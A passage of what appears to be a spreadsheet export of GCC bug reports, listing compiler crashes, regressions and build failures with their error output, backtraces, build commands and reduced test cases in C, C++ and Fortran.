/usr/local/src/gcc/libstdc++-v3/testsuite/22_locale/codecvt.cc:45: cannot 
   declare variable `facet01' to be of type `gnu_codecvt'
/usr/local/src/gcc/libstdc++-v3/testsuite/22_locale/codecvt.cc:45:   because 
   the following virtual functions are abstract:
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:125: 
   std::codecvt_base::result std::__codecvt_abstract_base&lt;_InternT _ExternT 
   _StateT&gt;::do_out(_StateT&amp; const _InternT* const _InternT* const 
   _InternT*&amp; _ExternT* _ExternT* _ExternT*&amp;) const [with _InternT = 
   unsigned char _ExternT = long unsigned int _StateT = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:129: 	
   std::codecvt_base::result std::__codecvt_abstract_base&lt;_InternT _ExternT 
   _StateT&gt;::do_unshift(_StateT&amp; _ExternT* _ExternT* _ExternT*&amp;) const [with 
   _InternT = unsigned char _ExternT = long unsigned int _StateT = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:135: 	
   std::codecvt_base::result std::__codecvt_abstract_base&lt;_InternT _ExternT 
   _StateT&gt;::do_in(_StateT&amp; const _ExternT* const _ExternT* const 
   _ExternT*&amp; _InternT* _InternT* _InternT*&amp;) const [with _InternT = 
   unsigned char _ExternT = long unsigned int _StateT = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:138: 	int 
   std::__codecvt_abstract_base::do_encoding() 
   const [with _InternT = unsigned char _ExternT = long unsigned int _StateT 
   = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:141: 	
   bool std::__codecvt_abstract_base&lt;_InternT _ExternT 
   _StateT&gt;::do_always_noconv() const [with _InternT = unsigned char _ExternT 
   = long unsigned int _StateT = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:145: 	int 
   std::__codecvt_abstract_base::do_length(const 
   _StateT&amp; const _ExternT* const _ExternT* unsigned int) const [with 
   _InternT = unsigned char _ExternT = long unsigned int _StateT = char]
/usr/local/obj/gcc/i686-pc-cygwin/libstdc++-v3/include/bits/codecvt.h:148: 	int 
   std::__codecvt_abstract_base::do_max_length() 
   const [with _InternT = unsigned char _ExternT = long unsigned int _StateT 
   = char]
Release:
gcc 3.1 20011030
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-71071</t>
  </si>
  <si>
    <t>[7 regression] ICE --enable-checking=fold : fold check: original tree changed by fold</t>
  </si>
  <si>
    <t>r236043 PASS
r236132 FAIL
/home/dimhen/src/gcc_current/configure --prefix=/usr/local/gcc_current --enable-checking=fold --enable-languages=cc++ --disable-multilib
/home/dimhen/build/gcc_current/./gcc/xgcc -B/home/dimhen/build/gcc_current/./gcc/ -B/usr/local/gcc_current/x86_64-pc-linux-gnu/bin/ -B/usr/local/gcc_current/x86_64-pc-linux-gnu/lib/ -isystem /usr/local/gcc_current/x86_64-pc-linux-gnu/include -isystem /usr/local/gcc_current/x86_64-pc-linux-gnu/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -mlong-double-80 -DUSE_ELF_SYMVER -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -mlong-double-80 -DUSE_ELF_SYMVER -I. -I. -I../.././gcc -I/home/dimhen/src/gcc_current/libgcc -I/home/dimhen/src/gcc_current/libgcc/. -I/home/dimhen/src/gcc_current/libgcc/../gcc -I/home/dimhen/src/gcc_current/libgcc/../include -I/home/dimhen/src/gcc_current/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o _gcov.o -MT _gcov.o -MD -MP -MF _gcov.dep -DL_gcov -c /home/dimhen/src/gcc_current/libgcc/libgcov-driver.c
/home/dimhen/src/gcc_current/libgcc/libgcov-driver.c: In function '__gcov_dump_one':
/home/dimhen/src/gcc_current/libgcc/libgcov-driver.c:855:3: internal compiler error: fold check: original tree changed by fold
   if (root-&gt;dumped)
   ^~
0xa3931f fold_check_failed
	/home/dimhen/src/gcc_current/gcc/fold-const.c:12099
0xa3a05c fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:12358
0x11e7407 generic_simplify_186
	/home/dimhen/build/gcc_current/gcc/generic-match.c:6903
0x1224527 generic_simplify_NE_EXPR
	/home/dimhen/build/gcc_current/gcc/generic-match.c:27430
0x1229e7a generic_simplify(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/build/gcc_current/gcc/generic-match.c:29656
0xa2e7af fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:9265
0xa39f9c fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:12347
0x80aa18 c_fully_fold_internal
	/home/dimhen/src/gcc_current/gcc/c/c-fold.c:305
0x80a147 c_fully_fold(tree_node* bool bool*)
	/home/dimhen/src/gcc_current/gcc/c/c-fold.c:90
0x7de299 c_parser_condition
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5314
0x7de2f7 c_parser_paren_condition
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5331
0x7de775 c_parser_if_statement
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5493
0x7ddac5 c_parser_statement_after_labels
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5138
0x7dd543 c_parser_compound_statement_nostart
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4858
0x7dcf5a c_parser_compound_statement
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4693
0x7d7fb7 c_parser_declaration_or_fndef
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:2105
0x7d6b98 c_parser_external_declaration
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:1549
0x7d6740 c_parser_translation_unit
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:1430
0x801c9e c_parse_file()
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:17915
0x8602ec c_common_parse_file()
	/home/dimhen/src/gcc_current/gcc/c-family/c-opts.c:1064
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-530</t>
  </si>
  <si>
    <t>Courier 0.27 causes internal compiler error</t>
  </si>
  <si>
    <t>c++ -I./.. -I.. -I./../afx -I./../rfc822 -I./libs -Wall -O6 -march=i686 -mcpu=i6
86 -fno-strength-reduce -ffast-math -fexpensive-optimizations -fomit-frame-point
er -malign-double -o aliascreate cppmain.o aliascreate.o libs/libcommon.a libs/l
ibcourier.a ../gdbmobj/libgdbmobj.a ../afx/libafx.a -lgdbm
c++ -DHAVE_CONFIG_H -I. -I. -I.     `cat cxxflags` -c submit.C
submit.C: In function `void getrcpts (rw_info *)':
submit.C:352: Internal compiler error in emit_move_insn_1 at expr.c:
2830
Please submit a full bug report.
See  for instructions.
make[3]: *** [submit.o] Error 1
make[3]: Leaving directory `/usr/src/redhat/BUILD/courier-0.27/courier'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/usr/src/redhat/BUILD/courier-0.27/courier'
make[1]: *** [all-recursive-am] Error 2
make[1]: Leaving directory `/usr/src/redhat/BUILD/courier-0.27/courier'
make: *** [all-recursive] Error 1
Bad exit status from /var/tmp/rpm-tmp.48397 (%build)
Release:
gcc version 2.96 20000724 (experimental)
Environment:
Red Hat Linux Pinstripe kernel 2.2.16-21 glibc 2.1.92-5
How-To-Repeat:
By compiling Courier 0.27?</t>
  </si>
  <si>
    <t>GCC-2530</t>
  </si>
  <si>
    <t>java-interp.h (in gcc 3.0) fails to compile with certain options</t>
  </si>
  <si>
    <t>I got the following error msg while compiling (with the options noted below) gcc 3.0:
In file included from ../../../gcc-20010402/libjava/jni.cc:48:
../../../gcc-20010402/libjava/include/java-interp.h:121: type specifier omitted 
   for parameter
../../../gcc-20010402/libjava/include/java-interp.h:121: parse error before `*' 
   token
../../../gcc-20010402/libjava/include/java-interp.h:122: type specifier omitted 
   for parameter
../../../gcc-20010402/libjava/include/java-interp.h:122: parse error before `*' 
   token
../../../gcc-20010402/libjava/include/java-interp.h:123: type specifier omitted 
   for parameter
../../../gcc-20010402/libjava/include/java-interp.h:123: parse error before `*' 
   token
../../../gcc-20010402/libjava/include/java-interp.h:125: type specifier omitted 
   for parameter
../../../gcc-20010402/libjava/include/java-interp.h:125: parse error before `*' 
   token
../../../gcc-20010402/libjava/include/java-interp.h:198: type specifier omitted 
   for parameter
../../../gcc-20010402/libjava/include/java-interp.h:198: parse error before `*' 
   token
../../../gcc-20010402/libjava/jni.cc:1768: type specifier omitted for parameter
../../../gcc-20010402/libjava/jni.cc:1768: parse error before `*' token
../../../gcc-20010402/libjava/jni.cc: In static member function `static void 
   _Jv_JNIMethod::call(...)':
../../../gcc-20010402/libjava/jni.cc:1770: `__this' undeclared (first use this 
   function)
../../../gcc-20010402/libjava/jni.cc:1770: (Each undeclared identifier is 
   reported only once for each function it appears in.)
../../../gcc-20010402/libjava/jni.cc:1787: `ffi_raw' undeclared (first use this 
   function)
../../../gcc-20010402/libjava/jni.cc:1787: parse error before `[' token
../../../gcc-20010402/libjava/jni.cc:1791: `real_args' undeclared (first use 
   this function)
../../../gcc-20010402/libjava/jni.cc:1799: `args' undeclared (first use this 
   function)
../../../gcc-20010402/libjava/jni.cc:1803: `ret' undeclared (first use this 
   function)
../../../gcc-20010402/libjava/jni.cc:1803: `ffi_raw_call' undeclared (first use 
   this function)
make[3]: *** [jni.lo] Error 1
make[3]: Leaving directory `/mnt/compile/linux/gcc/gccbuild/i686-pc-linux-gnu/libjava'
|ffi_raw| doesn't seem to be found.
Release:
gcc-20010402
Environment:
Redhat 6.0-6.2 gcc2.95.2
How-To-Repeat:
../gcc-20010402/configure --prefix=/usr/local/packages/java/gcc/ --enable-optimize --disable-debug --enable-shared --enable-threads --enable-languages=c++java
make LIBCFLAGS='-O2' LIBCXXFLAGS='-O2 -fno-implicit-templates' bootstrap-lean
Sorry no time to pin down. My guess is bootstrap-lean your guess is probably better.</t>
  </si>
  <si>
    <t>GCC-24670</t>
  </si>
  <si>
    <t>[4.1 Regression] VRP ICE in compare_name_with_value</t>
  </si>
  <si>
    <t>This ICE occured during a compile of libfloat with mainline.
Attached is a delta reduced test that produces the ICE when compiled with -O2.
softfloat/bits64/softfloat.c: In function â€˜float128_remâ€™:
softfloat/bits64/softfloat.c:4483: internal compiler error: in compare_name_with_value at tree-vrp.c:3064
__inline__ void
shift128Right (int count long long int *z1Ptr)
{
  long long int z1
  if (count == 0)
  else if (count &lt; 64)
  else
    z1 = (count &lt; 64) ? count : 0
  *z1Ptr = z1
}
float128_rem ()
{
  signed int expDiff
  long long int aSig1
  long long int sigMean1
  if (-64 &lt; expDiff)
    shift128Right (-expDiff 
  add128 (
}</t>
  </si>
  <si>
    <t>GCC-38891</t>
  </si>
  <si>
    <t>using ms_abi function attribute with -mno-sse generates an internal compiler error</t>
  </si>
  <si>
    <t>The reported error is:
internal compiler error: in init_reg_sets_1 at regclass.c:594
SVN version @ revision r143453</t>
  </si>
  <si>
    <t>a.pignotti</t>
  </si>
  <si>
    <t>GCC-3371</t>
  </si>
  <si>
    <t>sh-elf fails to compile on gcc 3.0 CVS branch</t>
  </si>
  <si>
    <t>../gcc/configure --target=sh-elf --with-gnu-as --with-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools --enable-languages=cc++ &amp;&amp; make
fails with this error:
/tmp/cc3DKD8g.s: Assembler messages:
/tmp/cc3DKD8g.s:2: Warning: Missing string
/tmp/cc3DKD8g.s:2: Error: Rest of line ignored. First ignored character is `1'.
make[2]: *** [libgcc/./_muldi3.o] Error 1
Release:
gcc 3.0 CVS branch
Environment:
GNU/Linux RedHat 6.2 targetting sh-elf
How-To-Repeat:
configure and build per description.
I used binutils 2.10 and newlib 1.9.0</t>
  </si>
  <si>
    <t>GCC-39001</t>
  </si>
  <si>
    <t>lto branch doesn't build</t>
  </si>
  <si>
    <t>It doesn't build on SLES10 either libelf0-0.8.10-36 it ICEs during
build of libgcc:
...
/gcc/spec/sb-haydn-df-64/gcc/libgcc/../gcc/libgcc2.c:1102: internal
compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
libelf shouldn't come into play while building no?
Program received signal SIGSEGV Segmentation fault.
output_call_frame_info (for_eh=0)
   at /gcc/spec/sb-haydn-df-64/gcc/gcc/expr.h:806
806       tree personality = DECL_FUNCTION_PERSONALITY (decl)
#0  output_call_frame_info (for_eh=0)
   at /gcc/spec/sb-haydn-df-64/gcc/gcc/expr.h:806
#1  0x00000000004ccf37 in dwarf2out_frame_finish ()
   at /gcc/spec/sb-haydn-df-64/gcc/gcc/dwarf2out.c:3351
#2  0x0000000000630dd6 in toplev_main (argc= argv=0x0)
   at /gcc/spec/sb-haydn-df-64/gcc/gcc/toplev.c:1023
#3  0x00002ae177b25154 in __libc_start_main () from /lib64/libc.so.6
#4  0x0000000000404199 in _start ()
this is on x86_64 the above ICE is with -m32.
Richard.</t>
  </si>
  <si>
    <t>GCC-80754</t>
  </si>
  <si>
    <t>[8 Regression][LRA] Invalid smull instruction generated in lra-remat</t>
  </si>
  <si>
    <t>Hi
After r247881 below invalid smull instructions are generated:
  smull r2 r2 lr r3
in test gcc.c-torture/execute/pr53645-2.c for arm-none-linux-gnueabi and cortex-a9
The revision simply changes rtx cost for tieable modes:
diff --git a/gcc/rtlanal.c b/gcc/rtlanal.c
index 321363f..d9f57c3 100644
--- a/gcc/rtlanal.c
+++ b/gcc/rtlanal.c
@@ -41646 +416413 @@ rtx_cost (rtx x machine_mode mode enum rtx_code outer_code
 	return COSTS_N_INSNS (2 + factor)
       break
+    case TRUNCATE:
+      if (MODES_TIEABLE_P (mode GET_MODE (XEXP (x 0))))
+	{
+	  total = 0
+	  break
+	}
+      /* FALLTHRU */
     default:
       if (targetm.rtx_costs (x mode outer_code opno &amp;total speed))
 	return total
I noticed that in arm.h/arm.c:
/* Implement MODES_TIEABLE_P.  */
bool
arm_modes_tieable_p (machine_mode mode1 machine_mode mode2)
{
  if (GET_MODE_CLASS (mode1) == GET_MODE_CLASS (mode2))
    return true
  /* We specifically want to allow elements of structure modes to
     be tieable to the structure.  This more general condition allows
     other rarer situations too.  */
  if (TARGET_NEON
      &amp;&amp; (VALID_NEON_DREG_MODE (mode1)
	  || VALID_NEON_QREG_MODE (mode1)
	  || VALID_NEON_STRUCT_MODE (mode1))
      &amp;&amp; (VALID_NEON_DREG_MODE (mode2)
	  || VALID_NEON_QREG_MODE (mode2)
	  || VALID_NEON_STRUCT_MODE (mode2)))
    return true
  return false
}
So SImode/DImode are tieable on ARM target while we have :
(define_insn *smulsi3_highpart_v6
  [(set (match_operand:SI 0 s_register_operand =r)
	(truncate:SI
	 (lshiftrt:DI
	  (mult:DI
	   (sign_extend:DI (match_operand:SI 1 s_register_operand r))
	   (sign_extend:DI (match_operand:SI 2 s_register_operand r)))
	  (const_int 32))))
   (clobber (match_scratch:SI 3 =r))]
  TARGET_32BIT &amp;&amp; arm_arch6
  smull%?\\t%3 %0 %2 %1
  [(set_attr type smull)
   (set_attr predicable yes)
   (set_attr predicable_short_it no)]
)
It looks operand 0 and 3 now get allocated to the same register.  
I think this might be a backend issue either in tieable interface or *smulsi3_highpart_v6 constraint?
Thanks
bin</t>
  </si>
  <si>
    <t>GCC-49006</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Missed vectorization due to revision 167531</t>
  </si>
  <si>
    <t>Created attachment 24250
source code
On x86_64-apple-darwin10 the attached code (an avatar of the polyhedron test induct.f90) is no longer properly vectorized after revision 167531:
[macbook] lin/test% /opt/gcc/gcc4.6p-167530/bin/gfortran -Ofast -ftree-vectorizer-verbose=2 induct_v4.f90
...
induct_v4.f90:1757: note: not vectorized: can't create epilog loop 1.
induct_v4.f90:1766: note: LOOP VECTORIZED.
induct_v4.f90:1711: note: LOOP VECTORIZED.
induct_v4.f90:1633: note: LOOP VECTORIZED.
induct_v4.f90:1449: note: vectorized 3 loops in function.
induct_v4.f90:2168: note: not vectorized: can't create epilog loop 1.
induct_v4.f90:2177: note: LOOP VECTORIZED.
induct_v4.f90:2095: note: LOOP VECTORIZED.
induct_v4.f90:2018: note: LOOP VECTORIZED.
induct_v4.f90:1832: note: vectorized 3 loops in function.
...
[macbook] lin/test% time a.out &gt; /dev/null
12.677u 0.027s 0:12.70 99.9%	0+0k 0+1io 0pf+0w
[macbook] lin/test% /opt/gcc/gcc4.6p-167531/bin/gfortran -Ofast -ftree-vectorizer-verbose=2 induct_v4.f90
...
induct_v4.f90:1728: note: not vectorized: unsupported use in stmt.
induct_v4.f90:1757: note: not vectorized: unsupported use in stmt.
induct_v4.f90:1711: note: LOOP VECTORIZED.
induct_v4.f90:1633: note: LOOP VECTORIZED.
induct_v4.f90:1449: note: vectorized 2 loops in function.
induct_v4.f90:2168: note: not vectorized: unsupported use in stmt.
induct_v4.f90:2095: note: LOOP VECTORIZED.
induct_v4.f90:2018: note: LOOP VECTORIZED.
induct_v4.f90:1832: note: vectorized 2 loops in function.
...
[macbook] lin/test% time a.out &gt; /dev/null
21.831u 0.031s 0:21.86 100.0%	0+0k 0+0io 0pf+0w</t>
  </si>
  <si>
    <t>GCC-5870</t>
  </si>
  <si>
    <t>[alpha osf1 5.0] gcc-20020304 bootstrap fails with fatal internal compiler error in tmp-dum.c</t>
  </si>
  <si>
    <t>./xgcc -B./ \
	-B/uufs/XXXXXX.utah.edu/common/home/mthnhb/alpha/local/test/alphaev67-dec-osf5.0/bin/ \
	-isystem \
	/uufs/XXXXXX.utah.edu/common/home/mthnhb/alpha/local/test/alphaev67-dec-osf5.0/include \
	-isystem \
	/uufs/XXXXXX.utah.edu/common/home/mthnhb/alpha/local/test/alphaev67-dec-osf5.0/sys-include \
	-S tmp-dum.c
cc1: Internal compiler error in
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
[To date NO version of gcc (2.95.x or 3.x) has built successfully on
this platform here at Utah.]
Release:
3.1 20020304 (prerelease)
Environment:
	Compaq AlphaServer DS20 Sierra/667 (EV?? 21264 CPU 667 MHz ????MB RAM) OSF/1 5.0
	% uname -a
	OSF1 XXXXXXXX V5.0 910 alpha
host: alphaev67-dec-osf5.0
build: alphaev67-dec-osf5.0
target: alphaev67-dec-osf5.0
configured with: ../gcc-20020304/configure --prefix=/usr/local/test --enable-cpplib --enable-libgcj --enable-shared --enable-version-specific-runtime-libs --with-local-prefix=/usr/local --enable-threads
How-To-Repeat:
../gcc-20020304/configure 
--prefix=/usr/local/test \
	--enable-cpplib \
	--enable-libgcj \
	--enable-shared \
	--enable-version-specific-runtime-libs \
	--with-local-prefix=/usr/local \
	--enable-threads &amp;&amp;
		make bootstrap</t>
  </si>
  <si>
    <t>GCC-65228</t>
  </si>
  <si>
    <t>ICE: expected tree that contains â€˜decl minimalâ€™ structure have â€˜error_markâ€™ in start_decl</t>
  </si>
  <si>
    <t>FAIL: gcc (GCC) 5.0.0 20150226 (experimental)
PATH=/home/jkratoch/redhat/gcchead-root/bin:$PATH LD_LIBRARY_PATH=/home/jkratoch/redhat/gcchead-root/lib64 /home/jkratoch/redhat/gdb-clean/gdb/gdb -nx gdb -ex start -ex 'compile code -r __auto_type qwe = def'
gdb command line:1:19: error: â€˜defâ€™ undeclared here (not in a function)
*** WARNING *** there are active plugins do not report this as a bug unless you can reproduce it without enabling any plugins.
Event                            | Plugins
PLUGIN_PRE_GENERICIZE            | libcc1plugin
PLUGIN_GGC_MARKING               | libcc1plugin
PLUGIN_PRAGMAS                   | libcc1plugin
gdb command line:2:1: internal compiler error: tree check: expected tree that contains â€˜decl minimalâ€™ structure have â€˜error_markâ€™ in start_decl at c/c-decl.c:4469
0xd41bd4 tree_contains_struct_check_failed(tree_node const* tree_node_structure_enum char const* int char const*)
	/home/jkratoch/redhat/gcchead/gcc/tree.c:9462
0x605649 contains_struct_check(tree_node* tree_node_structure_enum char const* int char const*)
	/home/jkratoch/redhat/gcchead/gcc/tree.h:2960
0x605649 start_decl(c_declarator* c_declspecs* bool tree_node*)
	/home/jkratoch/redhat/gcchead/gcc/c/c-decl.c:4469
0x640dec c_parser_declaration_or_fndef
	/home/jkratoch/redhat/gcchead/gcc/c/c-parser.c:1802
0x65d317 c_parser_external_declaration
	/home/jkratoch/redhat/gcchead/gcc/c/c-parser.c:1452
0x65dbd9 c_parser_translation_unit
	/home/jkratoch/redhat/gcchead/gcc/c/c-parser.c:1339
0x65dbd9 c_parse_file()
	/home/jkratoch/redhat/gcchead/gcc/c/c-parser.c:15418
0x6b4062 c_common_parse_file()
	/home/jkratoch/redhat/gcchead/gcc/c-family/c-opts.c:1057
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Compilation failed.
(gdb) _
For gcc-5.0.0-0.15.fc23.x86_64 the same reproducer hangs due to FD not closed by the driver but that is a different bug.
Filing as a tracker I guess it is libcc1 specific so we should fix it.</t>
  </si>
  <si>
    <t>GCC-20867</t>
  </si>
  <si>
    <t>statement function args not given implicit type early enough</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
  REAL :: st1
  st1(I)=I**2 ! I implicitly typed to integer
  REAL :: I
  END</t>
  </si>
  <si>
    <t>GCC-2929</t>
  </si>
  <si>
    <t>gcc crash when compiling a sample</t>
  </si>
  <si>
    <t>In file included from ../MSTypes/MSStringUtil.H:39
                 from MSBool.C:20:
../MSTypes/MSFloatVector.H:158: Internal compiler error in pop_binding at
   cp/decl.c:1202
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
Reading specs from /usr/local/gcc-3.0-20010523/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/specs
Configured with: ../configure --prefix=/tmp/gcc-20010523-root/usr/local/gcc-3.0-20010523 --enable-shared --enable-threads --disable-checking i386-pc-linux-gnu :
 (reconfigured)
Thread model: posix
gcc version 3.0 20010523 (prerelease)   
Linux mglnxcs02 2.4.4smp #14 SMP Thu May 17 09:57:43 EDT 2001 i686 unknown
How-To-Repeat:
g++ gcc_crash.i</t>
  </si>
  <si>
    <t>andrei.keis</t>
  </si>
  <si>
    <t>GCC-14085</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] when compiling template functors</t>
  </si>
  <si>
    <t>The following message appears:
GNU CPP version 3.2 (mingw special 20020817-1) (cpplib) (80386 BSD syntax)
GNU C++ version 3.2 (mingw special 20020817-1) (mingw32)
        compiled by GNU C version 3.2.
t.cpp:6: `Op::first_argument_type' is not a type use `typename
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
when compiling the code:
#include 
using namespace std
template 
bool asfun(Op f Op::first_argument_type a Op::second_argument_type b)
{
        return Op(a b)
}
int
main(int argc char *argv[])
{
        return asfun(equal_to 5 5)
}</t>
  </si>
  <si>
    <t>dds</t>
  </si>
  <si>
    <t>GCC-5530</t>
  </si>
  <si>
    <t>Problems with named locales LANG=fr_FR</t>
  </si>
  <si>
    <t>There are new problems with named locales. When I take the test case
included in PR/libstdc++ 5280 and set LANG=fr_FR the program does not
run normally. It comsumes all virtual memory until it is killed by
the kernel a killed message appears. If I remember correctly the
program worked when I last tried about a week ago.
Release:
3.1 20020128 (experimental)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
SuSE 7.3
glibc 2.2.4 + patches
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
source code tl.C
#include 
#include 
#include 
#include 
using namespace std
int main()
{
  locale coutLocale()
  cout.imbue(coutLocale)
  string s
  cin &gt;&gt; s
  if (!cin) {
    cerr &lt;&lt; ERROR while reading the locale &lt;&lt; endl
    return EXIT_FAILURE
  }
  locale cinLocale(s.c_str())
  cin.imbue(cinLocale)
  cout &lt;&lt; cout locale:  &lt;&lt; coutLocale.name() &lt;&lt; endl
  cout &lt;&lt; cin locale:  &lt;&lt; cinLocale.name() &lt;&lt; endl
  double value
  while (cin &gt;&gt; value) {
    cout &lt;&lt; value &lt;&lt; endl
  }
  cout&lt;&lt;rdstate after reading from cin : 
      &lt;&lt; cin.rdstate() &lt;&lt; endl
  cout&lt;&lt;good eof fail bad 
      &lt;&lt; ios::goodbit &lt;&lt;  
      &lt;&lt; ios::eofbit &lt;&lt;  
      &lt;&lt; ios::failbit &lt;&lt;  
      &lt;&lt; ios::badbit &lt;&lt; endl
}
Compiling tl
g++ -v -o tl tl.C -W -Wall -g
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020128 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tl.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tl.C -g -W -Wall -version -o /tmp/ccCTDZqZ.s
GNU CPP version 3.1 20020128 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020128 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020128 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o /tmp/ccJpELoI.o /tmp/ccCTDZqZ.s
GNU assembler version 2.11.92.0.12.3 (i686-pc-linux-gnu) using BFD version 2.11.92.0.12.3 20011121
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o tl /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../.. /tmp/ccJpELoI.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtend.o /usr/lib/crtn.o
GNU gdb 20020118
Copyright 2001 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu...
(gdb) set environment LANG=fr_FR
(gdb) r
Starting program: /home/peter/tl 
de_DE
cout locale: fr_FR
cin locale: de_DE
12
Program terminated with signal SIGKILL Killed.
The program no longer exists.</t>
  </si>
  <si>
    <t>GCC-53521</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7/4.8 Regression] Memory leak with zero-sized array constructor</t>
  </si>
  <si>
    <t>The following testcase (as reduced from CP2K) leaks memory when compiled with gfortran 4.6 - 4.8 :
MODULE TEST
 IMPLICIT NONE
CONTAINS
 SUBROUTINE T(n1)
  INTEGER :: n1(:)
 END SUBROUTINE T
 SUBROUTINE T2(n)
   INTEGER :: n
   INTEGER :: k
   CALL T((/(kk=1n-1)/))
 END SUBROUTINE
END MODULE
USE TEST
  CALL T2(1)
END 
as can be verified with valgrind or putting a loop around call t2. The issue seems to be the zero-sized array constructor.</t>
  </si>
  <si>
    <t>GCC-66724</t>
  </si>
  <si>
    <t>ICE on input/output statements with wrong specifier data</t>
  </si>
  <si>
    <t>For most input/output statements and for several specifiers
compilation aborts if assigned specifier key is not changeable
(is a constant) and/or is of wrong data type etc.
Several combinations are causing a segfault some examples :
$ cat z_iostmt_iomsg_1.f90
program p
   backspace (1 iomsg=1)
   close (1 iomsg=1)
   endfile (1 iomsg=1)
   flush (1 iomsg=1)
   inquire (1 iomsg=1)
   open (1 iomsg=1)
   read (1 iomsg=1)
   rewind (1 iomsg=1)
   wait (1 iomsg=1)
   write (1 iomsg=1)
end
$ cat z_open_iomsg.f90
program p
   open (1 iomsg=1)
   open (1 iomsg=1e1)
   open (1 iomsg=1d1)
   open (1 iomsg='no')
   open (1 iomsg='')
   open (1 iomsg=.true.)
   open (1 iomsg=[1])
   open (1 iomsg=[''])
   ! ...
end
# analogous if open replaced with some other io-stmt
$ cat z_open_specifier.f90
program p
   open (1 access=.false.)
   open (1 action=.false.)
